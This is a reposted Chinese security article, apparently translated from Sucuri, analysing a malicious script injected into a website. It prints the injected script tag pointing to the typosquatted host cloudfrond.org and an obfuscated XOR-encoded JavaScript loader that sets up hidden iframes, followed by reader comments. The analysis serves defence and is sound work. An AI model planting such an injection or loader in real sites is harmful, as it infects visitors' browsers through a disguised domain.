CVE漏洞中文网

0DayBank一个专门收集整理全球互联网漏洞的公开发布网站
  1. 首页
  2. 百科
  3. 正文

偷梁换柱对什么

2017年5月24日 837点热度 0人点赞 0条评论

偷梁换柱对什么

  • 首页
  • 分类阅读
  • 文库
  • 专栏
  • 公开课
  • 商城
  • 漏洞盒子
注册 | 登录
投稿

偷梁换柱:对一个可疑Payload的研究

dawner2015-01-13共114198人围观 ,发现 9 个不明物体WEB安全

我们团队一直致力于研究网络安全领域一些偏门的东西。对我们来说,每天挖掘新鲜的东西、了解攻击者的思路,以及发现最新的技术趋势是一件非常有意思的事。这也给了我们与大家分享的机会。

字母之差

当我们发现可疑Payload(攻击负载)时,我们会尝试去研究。也许在我们检测的时候,他们并不会出现任何问题,但这并不代表他们没有问题。

某网站下面发现的一个Payload,这是个极好的例子:

<!-- [if IE]><script type="text/javascript" src="hxxp://cloudfrond.org/golden.phtml"></script> <![endif]-->

看起来没问题吧?CloudFront是亚马逊web的CDN服务,很好很安全……麻烦再仔细看看?好吧,CloudFrond≠CloudFront,一个字母之差,你就可能中招了。

分析Payload

现在让我们来看看,该脚本到底加载了什么:

/*jskdljgdlkfjgdlkfg*/XJHNOs=print;rNjoDPv=String;RlH=rNjoDPv["fromCharCode"];crgLMK=parseInt;utO=function(a,b){return a.charAt(b);};var dOK='';var Glg='7d3d099208132cbb18d70636c524b94077a6e879d602dbfa0813ff71fd18bf53005c3a50932616ee71ad68bf114f9b6349e5431abc4509b7ad5e054778acbad4c34806e724b3eb7913224c745465249d8d6456f5b3442031ce9422be75f678e7b0c63fe25b3ad7a0c2935b2338079d55a1a972dafc0a1cfdf32f6151017843c3fba4e33a0c11517839376a3372772d557b98';var SUTbVRi='733b2ab628364cd076b5755fae4e9c281aca9319b45db58b6f82dc199e6ee17a0f5a1c75b80939d20ca5669f3270bb486d842273e07923d4cf2c696c16c7deb3bd0c63d1088dcc54312264487d5e49e07b207a5873a87d2b8f5cd181ca03294f089b6e230f52da53be966b2f297a330a4bb6afb3b15c954b76332b488da0a20766b9a9e0a23c1cbc7c856413a6be76669b1dbcd66acdb32aaa0d8f2bceafc65166dc84b91c8c652e79485c7575a56cd97c2cb91fa8b56e483f2c23dedf0aaf54cb5784902e6d68a16357823008e3300fd1b6d1b5c4b20d075309a66d667eb9a90e38d81448204db97e8d070a7d1c3012562e4b261ddb6729873cc415c4a90e431eabaf152c50b5';var w=0x0+0;for(var i=0;i<(Glg.length/2);i++){dOK+=RlH(crgLMK(utO(Glg,w)+utO(Glg,w+1),0x8+8)^crgLMK(utO(SUTbVRi,w)+utO(SUTbVRi,w+1),0x0F+1));w+=2;

以上其实是一个自定义编码过的脚本,在你每次访问时加载的内容都不同(算是一个视条件变化而变化的Payload)。

如果你用IE浏览器访问的话,它就只更改变量,而你使用其他浏览器,或者带着其他user-agent访问的话,输出就变得完全不可控了:

如果使用IE浏览器访问得到的内容,我们能够将其解码。尽管其看起来非常可疑,但是我们并没有发现恶意的payload部分,下面是我们截获的流量包:

在这里,它使用一个像素的iframe框架加载了google的某个网页,然后才加载它的下一个函数。

然而这个函数返回了一个404。我们猜测这个引用的函数已经变得不可用,或者黑客已经把它ban掉了。

在代码里还看到两个主函数:

1.建立iFrame

2.主payload里也用的同样的编码方式来隐藏iframe框架里的URL。

[参考来源 sucuri,由FreeBuf小编dawner翻译整理,转载请注明来自FreeBuf黑客与极客(FreeBuf.COM)]

dawner

dawner288 篇文章等级: 9级
|
|
  • 上一篇:恶意软件新玩法:隐匿在Pastebin上的后门
  • 下一篇:从零开始学CSRF
发表评论

已有 9 条评论

  • chengfangang (3级) 2015-01-13回复1楼

    我是来涨姿势的

    亮了(0)
  • 路人乙 2015-01-13回复2楼

    不知所云!

    亮了(1)
  • 鸢尾 (8级)打码改变人生 2015-01-13回复3楼

    可以理解成钓鱼么

    亮了(0)
  • difcareer (3级)我在简书上发起了一个Android安全专题,分为很多个子专题... 2015-01-13回复4楼

    亮点是:CloudFrond≠CloudFront?

    亮了(3)
  • malayke (3级) 2015-01-13回复5楼

    怎么没翻译完啊:理解攻击者意图[Understanding Intentions]。

    亮了(1)
  • Jumbo (6级)论坛https://www.chinabaiker.com 2015-01-13回复6楼

    研表究明,汉字序顺并不定一影阅响读!事证实明了也许当你看这完句话之后才发字现都乱是的。

    亮了(1)
  • iLink (1级) 2015-01-13回复7楼

    CloudFrond≠CloudFront 尼玛 知道我检查了多少遍么 最终发现楼主实在耍我

    亮了(1)
    • dawner (9级)黎明已经过去,黑暗就在眼前! 2015-01-13回复

      @ iLink  其实是作者在开玩笑。。

      亮了(1)
  • lixupeng (4级) 2015-01-13回复8楼

    学习!!

    亮了(0)

必须您当前尚未登录。登陆?注册

必须(保密)

表情插图

取消

dawner

dawner

黎明已经过去,黑暗就在眼前!

288 篇文章376 条评论

相关阅读

  • 我是如何利用Facebook DDoS攻击任意网站的
  • 渗透测试的艺术:Root this box第二部曲
  • 工具推荐:INURLB,一款高级黑客搜索引擎工具
  • 如何渗透Pocket内网
  • 基于Node.js的跨平台Web抓包替换工具 – LivePool

特别推荐

关注我们 分享每日精选文章

不容错过

  • Lcx的多种用法:3个功能+9个参数,你会怎么玩?ForWhat2017-02-20
  • 网络小黑揭秘系列之黑产江湖黑吃黑——中国菜刀的隐形把手360天眼实验室2016-02-26
  • FIT 2016集锦 | Hack Demo:银行卡之偷天换日FB独家2016-03-02
  • 局域网聊天软件攻防战追影人2017-05-04

FREEBUF

  • 免责声明
  • 关于我们
  • 加入我们

广告及服务

  • 寻求报道
  • 广告合作
  • 联系我们
  • 友情链接

关注我们

  • 官方微信
  • 新浪微博
  • 腾讯微博
  • Twitter

赞助商

Copyright © 2013 WWW.FREEBUF.COM All Rights Reserved 沪ICP备13033796号

css.php

正在加载中...

0daybank

标签: 暂无
最后更新:2017年5月24日

小助手

这个人很懒,什么都没留下

点赞
< 上一篇
下一篇 >

文章评论

您需要 登录 之后才可以评论

COPYRIGHT © 2024 www.pdr.cn CVE漏洞中文网. ALL RIGHTS RESERVED.

鲁ICP备2022031030号

联系邮箱:wpbgssyubnmsxxxkkk@proton.me